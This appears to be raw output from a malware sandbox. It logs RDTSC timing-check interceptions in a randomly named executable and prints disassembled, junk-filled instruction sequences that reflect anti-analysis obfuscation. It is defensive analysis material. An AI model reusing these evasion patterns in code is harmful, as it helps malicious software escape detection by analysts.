Source: C:\Users\user\Desktop\wIaKimJFke.exe	RDTSC instruction interceptor: First address: 4E7053C second address: 4E705AF instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FED7550886Bh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop edx 0x0000000a pop eax 0x0000000b push eax 0x0000000c pushad 0x0000000d pushfd 0x0000000e jmp 00007FED7550886Fh 0x00000013 add eax, 61456E6Eh 0x00000019 jmp 00007FED75508879h 0x0000001e popfd 0x0000001f mov bl, al 0x00000021 popad 0x00000022 xchg eax, ebp 0x00000023 jmp 00007FED75508873h 0x00000028 mov ebp, esp 0x0000002a push eax 0x0000002b push edx 0x0000002c jmp 00007FED75508875h 0x00000031 rdtsc
Source: C:\Users\user\Desktop\wIaKimJFke.exe	RDTSC instruction interceptor: First address: 4E705AF second address: 4E705B5 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\wIaKimJFke.exe	RDTSC instruction interceptor: First address: 4E705B5 second address: 4E705B9 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\wIaKimJFke.exe	RDTSC instruction interceptor: First address: 4E80EB1 second address: 4E80EC9 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007FED74F3E524h 0x00000009 rdtsc
Source: C:\Users\user\Desktop\wIaKimJFke.exe	RDTSC instruction interceptor: First address: 4E80EC9 second address: 4E80F29 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FED7550886Bh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop edx 0x0000000a pop eax 0x0000000b xchg eax, ebp 0x0000000c jmp 00007FED75508876h 0x00000011 push eax 0x00000012 jmp 00007FED7550886Bh 0x00000017 xchg eax, ebp 0x00000018 jmp 00007FED75508876h 0x0000001d mov ebp, esp 0x0000001f push eax 0x00000020 push edx 0x00000021 pushad 0x00000022 jmp 00007FED7550886Dh 0x00000027 mov ch, 8Eh 0x00000029 popad 0x0000002a rdtsc
Source: C:\Users\user\Desktop\wIaKimJFke.exe	RDTSC instruction interceptor: First address: 4E901E6 second address: 4E901EA instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\wIaKimJFke.exe	RDTSC instruction interceptor: First address: 4E901EA second address: 4E90207 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FED75508879h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\Desktop\wIaKimJFke.exe	RDTSC instruction interceptor: First address: 4E90207 second address: 4E90272 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushfd 0x00000004 jmp 00007FED74F3E527h 0x00000009 adc cx, CB6Eh 0x0000000e jmp 00007FED74F3E529h 0x00000013 popfd 0x00000014 pushad 0x00000015 popad 0x00000016 popad 0x00000017 pop edx 0x00000018 pop eax 0x00000019 xchg eax, ebp 0x0000001a pushad 0x0000001b mov edi, esi 0x0000001d jmp 00007FED74F3E526h 0x00000022 popad 0x00000023 push eax 0x00000024 push eax 0x00000025 push edx 0x00000026 jmp 00007FED74F3E51Eh 0x0000002b rdtsc
Source: C:\Users\user\Desktop\wIaKimJFke.exe	RDTSC instruction interceptor: First address: 4E90272 second address: 4E90277 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\wIaKimJFke.exe	RDTSC instruction interceptor: First address: 4E90277 second address: 4E90289 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 mov bx, 2392h 0x00000008 popad 0x00000009 pop edx 0x0000000a pop eax 0x0000000b xchg eax, ebp 0x0000000c push eax 0x0000000d push edx 0x0000000e push eax 0x0000000f push edx 0x00000010 push eax 0x00000011 push edx 0x00000012 rdtsc
Source: C:\Users\user\Desktop\wIaKimJFke.exe	RDTSC instruction interceptor: First address: 4E90289 second address: 4E9028D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\wIaKimJFke.exe	RDTSC instruction interceptor: First address: 4E9028D second address: 4E90293 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\wIaKimJFke.exe	RDTSC instruction interceptor: First address: 4E90293 second address: 4E90299 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\wIaKimJFke.exe	RDTSC instruction interceptor: First address: 4EB06DA second address: 4EB06DE instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\wIaKimJFke.exe	RDTSC instruction interceptor: First address: 4EB06DE second address: 4EB06E4 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\wIaKimJFke.exe	RDTSC instruction interceptor: First address: 4EB06E4 second address: 4EB07CD instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FED74F3E51Eh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 xchg eax, ecx 0x0000000a pushad 0x0000000b pushfd 0x0000000c jmp 00007FED74F3E51Eh 0x00000011 add ax, 0238h 0x00000016 jmp 00007FED74F3E51Bh 0x0000001b popfd 0x0000001c push eax 0x0000001d mov ebx, 29FE7A5Ah 0x00000022 pop edi 0x00000023 popad 0x00000024 push eax 0x00000025 pushad 0x00000026 pushfd 0x00000027 jmp 00007FED74F3E527h 0x0000002c jmp 00007FED74F3E523h 0x00000031 popfd 0x00000032 jmp 00007FED74F3E528h 0x00000037 popad 0x00000038 xchg eax, ecx 0x00000039 pushad 0x0000003a pushfd 0x0000003b jmp 00007FED74F3E51Eh 0x00000040 or si, 0158h 0x00000045 jmp 00007FED74F3E51Bh 0x0000004a popfd 0x0000004b popad 0x0000004c mov eax, dword ptr [76FB65FCh] 0x00000051 push eax 0x00000052 push edx 0x00000053 pushad 0x00000054 call 00007FED74F3E51Eh 0x00000059 pop ecx 0x0000005a pushfd 0x0000005b jmp 00007FED74F3E51Bh 0x00000060 add cx, 4CCEh 0x00000065 jmp 00007FED74F3E529h 0x0000006a popfd 0x0000006b popad 0x0000006c rdtsc
Source: C:\Users\user\Desktop\wIaKimJFke.exe	RDTSC instruction interceptor: First address: 4EB07CD second address: 4EB0842 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 mov di, F1E2h 0x00000007 call 00007FED75508873h 0x0000000c pop esi 0x0000000d popad 0x0000000e pop edx 0x0000000f pop eax 0x00000010 test eax, eax 0x00000012 push eax 0x00000013 push edx 0x00000014 pushad 0x00000015 pushfd 0x00000016 jmp 00007FED75508870h 0x0000001b sub cx, A7A8h 0x00000020 jmp 00007FED7550886Bh 0x00000025 popfd 0x00000026 pushfd 0x00000027 jmp 00007FED75508878h 0x0000002c jmp 00007FED75508875h 0x00000031 popfd 0x00000032 popad 0x00000033 rdtsc
Source: C:\Users\user\Desktop\wIaKimJFke.exe	RDTSC instruction interceptor: First address: 4EB0842 second address: 4EB0848 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\wIaKimJFke.exe	RDTSC instruction interceptor: First address: 4EB0848 second address: 4EB084C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\wIaKimJFke.exe	RDTSC instruction interceptor: First address: 4EB084C second address: 4EB08EB instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 je 00007FEDE6FC1628h 0x0000000e jmp 00007FED74F3E51Fh 0x00000013 mov ecx, eax 0x00000015 jmp 00007FED74F3E526h 0x0000001a xor eax, dword ptr [ebp+08h] 0x0000001d jmp 00007FED74F3E521h 0x00000022 and ecx, 1Fh 0x00000025 pushad 0x00000026 pushfd 0x00000027 jmp 00007FED74F3E51Ch 0x0000002c jmp 00007FED74F3E525h 0x00000031 popfd 0x00000032 mov edi, esi 0x00000034 popad 0x00000035 ror eax, cl 0x00000037 push eax 0x00000038 push edx 0x00000039 pushad 0x0000003a pushfd 0x0000003b jmp 00007FED74F3E51Fh 0x00000040 jmp 00007FED74F3E523h 0x00000045 popfd 0x00000046 pushad 0x00000047 popad 0x00000048 popad 0x00000049 rdtsc
Source: C:\Users\user\Desktop\wIaKimJFke.exe	RDTSC instruction interceptor: First address: 4EB08EB second address: 4EB08F1 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\wIaKimJFke.exe	RDTSC instruction interceptor: First address: 4EB08F1 second address: 4EB08F5 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\wIaKimJFke.exe	RDTSC instruction interceptor: First address: 4EB08F5 second address: 4EB0945 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FED75508871h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop edx 0x0000000a pop eax 0x0000000b leave 0x0000000c jmp 00007FED7550886Eh 0x00000011 retn 0004h 0x00000014 nop 0x00000015 mov esi, eax 0x00000017 lea eax, dword ptr [ebp-08h] 0x0000001a xor esi, dword ptr [00541014h] 0x00000020 push eax 0x00000021 push eax 0x00000022 push eax 0x00000023 lea eax, dword ptr [ebp-10h] 0x00000026 push eax 0x00000027 call 00007FED79EB9764h 0x0000002c push FFFFFFFEh 0x0000002e pushad 0x0000002f pushad 0x00000030 push ecx 0x00000031 pop ebx 0x00000032 mov esi, 02C753BFh 0x00000037 popad 0x00000038 mov edx, eax 0x0000003a popad 0x0000003b pop eax 0x0000003c jmp 00007FED7550886Eh 0x00000041 ret 0x00000042 nop 0x00000043 push eax 0x00000044 call 00007FED79EB977Ch 0x00000049 mov edi, edi 0x0000004b push eax 0x0000004c push edx 0x0000004d push eax 0x0000004e push edx 0x0000004f push eax 0x00000050 push edx 0x00000051 rdtsc
Source: C:\Users\user\Desktop\wIaKimJFke.exe	RDTSC instruction interceptor: First address: 4EB0945 second address: 4EB0949 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\wIaKimJFke.exe	RDTSC instruction interceptor: First address: 4EB0949 second address: 4EB094D instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\wIaKimJFke.exe	RDTSC instruction interceptor: First address: 4EB094D second address: 4EB0953 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\wIaKimJFke.exe	RDTSC instruction interceptor: First address: 4EB0953 second address: 4EB09A0 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FED75508874h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 xchg eax, ebp 0x0000000a jmp 00007FED75508870h 0x0000000f push eax 0x00000010 jmp 00007FED7550886Bh 0x00000015 xchg eax, ebp 0x00000016 push eax 0x00000017 push edx 0x00000018 jmp 00007FED75508875h 0x0000001d rdtsc
Source: C:\Users\user\Desktop\wIaKimJFke.exe	RDTSC instruction interceptor: First address: 4EB09A0 second address: 4EB09C9 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 call 00007FED74F3E527h 0x00000008 pop esi 0x00000009 mov cx, di 0x0000000c popad 0x0000000d pop edx 0x0000000e pop eax 0x0000000f mov ebp, esp 0x00000011 push eax 0x00000012 push edx 0x00000013 push eax 0x00000014 push edx 0x00000015 push eax 0x00000016 push edx 0x00000017 rdtsc
Source: C:\Users\user\Desktop\wIaKimJFke.exe	RDTSC instruction interceptor: First address: 4EB09C9 second address: 4EB09CD instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\wIaKimJFke.exe	RDTSC instruction interceptor: First address: 4EB09CD second address: 4EB09D1 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\wIaKimJFke.exe	RDTSC instruction interceptor: First address: 4EB09D1 second address: 4EB09D7 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\wIaKimJFke.exe	RDTSC instruction interceptor: First address: 4EB09D7 second address: 4EB09DD instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\wIaKimJFke.exe	RDTSC instruction interceptor: First address: 4EB09DD second address: 4EB09E1 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\wIaKimJFke.exe	RDTSC instruction interceptor: First address: 4EB09E1 second address: 4EB09FF instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FED74F3E521h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop edx 0x0000000a pop eax 0x0000000b pop ebp 0x0000000c push eax 0x0000000d push edx 0x0000000e push eax 0x0000000f push edx 0x00000010 push eax 0x00000011 push edx 0x00000012 rdtsc
Source: C:\Users\user\Desktop\wIaKimJFke.exe	RDTSC instruction interceptor: First address: 4EB09FF second address: 4EB0A03 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\wIaKimJFke.exe	RDTSC instruction interceptor: First address: 4EB0A03 second address: 4EB0A16 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FED74F3E51Fh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\Desktop\wIaKimJFke.exe	RDTSC instruction interceptor: First address: 4EB0A16 second address: 4EB0A2E instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007FED75508874h 0x00000009 rdtsc
Source: C:\Users\user\Desktop\wIaKimJFke.exe	RDTSC instruction interceptor: First address: 4EB0A2E second address: 4EB0A32 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\wIaKimJFke.exe	RDTSC instruction interceptor: First address: 4E60011 second address: 4E60021 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007FED7550886Ch 0x00000009 rdtsc
Source: C:\Users\user\Desktop\wIaKimJFke.exe	RDTSC instruction interceptor: First address: 4E60021 second address: 4E60025 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\wIaKimJFke.exe	RDTSC instruction interceptor: First address: 4E60025 second address: 4E60058 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push edx 0x00000009 jmp 00007FED7550886Ch 0x0000000e mov dword ptr [esp], ebp 0x00000011 jmp 00007FED75508870h 0x00000016 mov ebp, esp 0x00000018 push eax 0x00000019 push edx 0x0000001a pushad 0x0000001b movsx edx, ax 0x0000001e mov cl, 52h 0x00000020 popad 0x00000021 rdtsc
Source: C:\Users\user\Desktop\wIaKimJFke.exe	RDTSC instruction interceptor: First address: 4E60058 second address: 4E60073 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007FED74F3E527h 0x00000009 rdtsc
Source: C:\Users\user\Desktop\wIaKimJFke.exe	RDTSC instruction interceptor: First address: 4E60073 second address: 4E600CA instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 and esp, FFFFFFF8h 0x0000000b pushad 0x0000000c pushfd 0x0000000d jmp 00007FED7550886Eh 0x00000012 sbb ecx, 04A10E08h 0x00000018 jmp 00007FED7550886Bh 0x0000001d popfd 0x0000001e popad 0x0000001f xchg eax, ecx 0x00000020 jmp 00007FED75508876h 0x00000025 push eax 0x00000026 pushad 0x00000027 push edi 0x00000028 mov edi, esi 0x0000002a pop esi 0x0000002b mov esi, edx 0x0000002d popad 0x0000002e xchg eax, ecx 0x0000002f push eax 0x00000030 push edx 0x00000031 pushad 0x00000032 mov edx, ecx 0x00000034 mov ah, B5h 0x00000036 popad 0x00000037 rdtsc
Source: C:\Users\user\Desktop\wIaKimJFke.exe	RDTSC instruction interceptor: First address: 4E600CA second address: 4E600D0 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\wIaKimJFke.exe	RDTSC instruction interceptor: First address: 4E600D0 second address: 4E600EE instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 xchg eax, ebx 0x00000009 push eax 0x0000000a push edx 0x0000000b pushad 0x0000000c mov al, dl 0x0000000e call 00007FED7550886Eh 0x00000013 pop esi 0x00000014 popad 0x00000015 rdtsc
Source: C:\Users\user\Desktop\wIaKimJFke.exe	RDTSC instruction interceptor: First address: 4E600EE second address: 4E60109 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FED74F3E520h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a push eax 0x0000000b push edx 0x0000000c push eax 0x0000000d push edx 0x0000000e push eax 0x0000000f push edx 0x00000010 rdtsc
Source: C:\Users\user\Desktop\wIaKimJFke.exe	RDTSC instruction interceptor: First address: 4E60109 second address: 4E6010D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\wIaKimJFke.exe	RDTSC instruction interceptor: First address: 4E6010D second address: 4E60129 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FED74F3E528h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\Desktop\wIaKimJFke.exe	RDTSC instruction interceptor: First address: 4E60129 second address: 4E60174 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FED7550886Bh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 xchg eax, ebx 0x0000000a jmp 00007FED75508876h 0x0000000f mov ebx, dword ptr [ebp+10h] 0x00000012 push eax 0x00000013 push edx 0x00000014 pushad 0x00000015 jmp 00007FED7550886Dh 0x0000001a call 00007FED75508870h 0x0000001f pop esi 0x00000020 popad 0x00000021 rdtsc
Source: C:\Users\user\Desktop\wIaKimJFke.exe	RDTSC instruction interceptor: First address: 4E60174 second address: 4E601AA instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FED74F3E520h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 xchg eax, esi 0x0000000a jmp 00007FED74F3E520h 0x0000000f push eax 0x00000010 push eax 0x00000011 push edx 0x00000012 jmp 00007FED74F3E51Eh 0x00000017 rdtsc
Source: C:\Users\user\Desktop\wIaKimJFke.exe	RDTSC instruction interceptor: First address: 4E601AA second address: 4E601DB instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FED7550886Bh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 xchg eax, esi 0x0000000a jmp 00007FED75508876h 0x0000000f mov esi, dword ptr [ebp+08h] 0x00000012 push eax 0x00000013 push edx 0x00000014 pushad 0x00000015 mov ecx, edx 0x00000017 pushad 0x00000018 popad 0x00000019 popad 0x0000001a rdtsc
Source: C:\Users\user\Desktop\wIaKimJFke.exe	RDTSC instruction interceptor: First address: 4E601DB second address: 4E60217 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 movzx ecx, di 0x00000006 pushfd 0x00000007 jmp 00007FED74F3E527h 0x0000000c jmp 00007FED74F3E523h 0x00000011 popfd 0x00000012 popad 0x00000013 pop edx 0x00000014 pop eax 0x00000015 xchg eax, edi 0x00000016 push eax 0x00000017 push edx 0x00000018 push eax 0x00000019 push edx 0x0000001a pushad 0x0000001b popad 0x0000001c rdtsc
Source: C:\Users\user\Desktop\wIaKimJFke.exe	RDTSC instruction interceptor: First address: 4E60217 second address: 4E60232 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FED75508877h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\Desktop\wIaKimJFke.exe	RDTSC instruction interceptor: First address: 4E60232 second address: 4E6025E instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FED74F3E529h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a push eax 0x0000000b push edx 0x0000000c jmp 00007FED74F3E51Ch 0x00000011 rdtsc
Source: C:\Users\user\Desktop\wIaKimJFke.exe	RDTSC instruction interceptor: First address: 4E6025E second address: 4E60280 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 mov cx, dx 0x00000006 jmp 00007FED7550886Dh 0x0000000b popad 0x0000000c pop edx 0x0000000d pop eax 0x0000000e xchg eax, edi 0x0000000f push eax 0x00000010 push edx 0x00000011 pushad 0x00000012 mov eax, edx 0x00000014 mov ebx, 3E95653Ah 0x00000019 popad 0x0000001a rdtsc
Source: C:\Users\user\Desktop\wIaKimJFke.exe	RDTSC instruction interceptor: First address: 4E60280 second address: 4E60304 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FED74F3E520h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 test esi, esi 0x0000000b jmp 00007FED74F3E520h 0x00000010 je 00007FEDE700C885h 0x00000016 jmp 00007FED74F3E520h 0x0000001b cmp dword ptr [esi+08h], DDEEDDEEh 0x00000022 jmp 00007FED74F3E520h 0x00000027 je 00007FEDE700C86Eh 0x0000002d push eax 0x0000002e push edx 0x0000002f pushad 0x00000030 pushfd 0x00000031 jmp 00007FED74F3E51Dh 0x00000036 xor ax, 2476h 0x0000003b jmp 00007FED74F3E521h 0x00000040 popfd 0x00000041 mov ebx, ecx 0x00000043 popad 0x00000044 rdtsc
Source: C:\Users\user\Desktop\wIaKimJFke.exe	RDTSC instruction interceptor: First address: 4E60304 second address: 4E60320 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007FED75508878h 0x00000009 rdtsc
Source: C:\Users\user\Desktop\wIaKimJFke.exe	RDTSC instruction interceptor: First address: 4E60320 second address: 4E603C2 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 mov edx, dword ptr [esi+44h] 0x0000000b jmp 00007FED74F3E527h 0x00000010 or edx, dword ptr [ebp+0Ch] 0x00000013 pushad 0x00000014 pushfd 0x00000015 jmp 00007FED74F3E524h 0x0000001a and esi, 297AAE58h 0x00000020 jmp 00007FED74F3E51Bh 0x00000025 popfd 0x00000026 mov edi, esi 0x00000028 popad 0x00000029 test edx, 61000000h 0x0000002f pushad 0x00000030 pushfd 0x00000031 jmp 00007FED74F3E520h 0x00000036 sbb esi, 7C6C38B8h 0x0000003c jmp 00007FED74F3E51Bh 0x00000041 popfd 0x00000042 jmp 00007FED74F3E528h 0x00000047 popad 0x00000048 jne 00007FEDE700C7EBh 0x0000004e push eax 0x0000004f push edx 0x00000050 pushad 0x00000051 push ebx 0x00000052 pop ecx 0x00000053 movsx edi, cx 0x00000056 popad 0x00000057 rdtsc
Source: C:\Users\user\Desktop\wIaKimJFke.exe	RDTSC instruction interceptor: First address: 4E603C2 second address: 4E603D4 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007FED7550886Eh 0x00000009 rdtsc
Source: C:\Users\user\Desktop\wIaKimJFke.exe	RDTSC instruction interceptor: First address: 4E603D4 second address: 4E6043B instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 test byte ptr [esi+48h], 00000001h 0x0000000c pushad 0x0000000d call 00007FED74F3E51Dh 0x00000012 pushfd 0x00000013 jmp 00007FED74F3E520h 0x00000018 add ecx, 7E9CF7D8h 0x0000001e jmp 00007FED74F3E51Bh 0x00000023 popfd 0x00000024 pop esi 0x00000025 jmp 00007FED74F3E529h 0x0000002a popad 0x0000002b jne 00007FEDE700C78Bh 0x00000031 push eax 0x00000032 push edx 0x00000033 pushad 0x00000034 mov edx, 66E7774Eh 0x00000039 popad 0x0000003a rdtsc
Source: C:\Users\user\Desktop\wIaKimJFke.exe	RDTSC instruction interceptor: First address: 4E6043B second address: 4E60441 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\wIaKimJFke.exe	RDTSC instruction interceptor: First address: 4E60441 second address: 4E60445 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\wIaKimJFke.exe	RDTSC instruction interceptor: First address: 4E60445 second address: 4E60456 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 test bl, 00000007h 0x0000000b push eax 0x0000000c push edx 0x0000000d push eax 0x0000000e push edx 0x0000000f pushad 0x00000010 popad 0x00000011 rdtsc
Source: C:\Users\user\Desktop\wIaKimJFke.exe	RDTSC instruction interceptor: First address: 4E60456 second address: 4E60468 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FED74F3E51Eh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\Desktop\wIaKimJFke.exe	RDTSC instruction interceptor: First address: 4E60468 second address: 4E6047A instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007FED7550886Eh 0x00000009 rdtsc
Source: C:\Users\user\Desktop\wIaKimJFke.exe	RDTSC instruction interceptor: First address: 4E6047A second address: 4E6047E instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\wIaKimJFke.exe	RDTSC instruction interceptor: First address: 4E50884 second address: 4E508A8 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 mov ch, 9Ch 0x00000005 popad 0x00000006 pop edx 0x00000007 pop eax 0x00000008 xchg eax, ebp 0x00000009 jmp 00007FED7550886Dh 0x0000000e mov ebp, esp 0x00000010 pushad 0x00000011 movsx edi, si 0x00000014 popad 0x00000015 and esp, FFFFFFF8h 0x00000018 pushad 0x00000019 push ecx 0x0000001a push eax 0x0000001b push edx 0x0000001c rdtsc
Source: C:\Users\user\Desktop\wIaKimJFke.exe	RDTSC instruction interceptor: First address: 4E508A8 second address: 4E508CC instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ebx 0x00000005 popad 0x00000006 push ebx 0x00000007 jmp 00007FED74F3E524h 0x0000000c mov dword ptr [esp], ebx 0x0000000f push eax 0x00000010 push edx 0x00000011 push eax 0x00000012 push edx 0x00000013 pushad 0x00000014 popad 0x00000015 rdtsc
Source: C:\Users\user\Desktop\wIaKimJFke.exe	RDTSC instruction interceptor: First address: 4E508CC second address: 4E508E9 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FED75508879h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\Desktop\wIaKimJFke.exe	RDTSC instruction interceptor: First address: 4E508E9 second address: 4E5095C instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FED74F3E521h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 xchg eax, esi 0x0000000a pushad 0x0000000b call 00007FED74F3E51Ch 0x00000010 pushad 0x00000011 popad 0x00000012 pop eax 0x00000013 pushfd 0x00000014 jmp 00007FED74F3E521h 0x00000019 sbb eax, 43510FB6h 0x0000001f jmp 00007FED74F3E521h 0x00000024 popfd 0x00000025 popad 0x00000026 push eax 0x00000027 jmp 00007FED74F3E521h 0x0000002c xchg eax, esi 0x0000002d push eax 0x0000002e push edx 0x0000002f jmp 00007FED74F3E51Dh 0x00000034 rdtsc
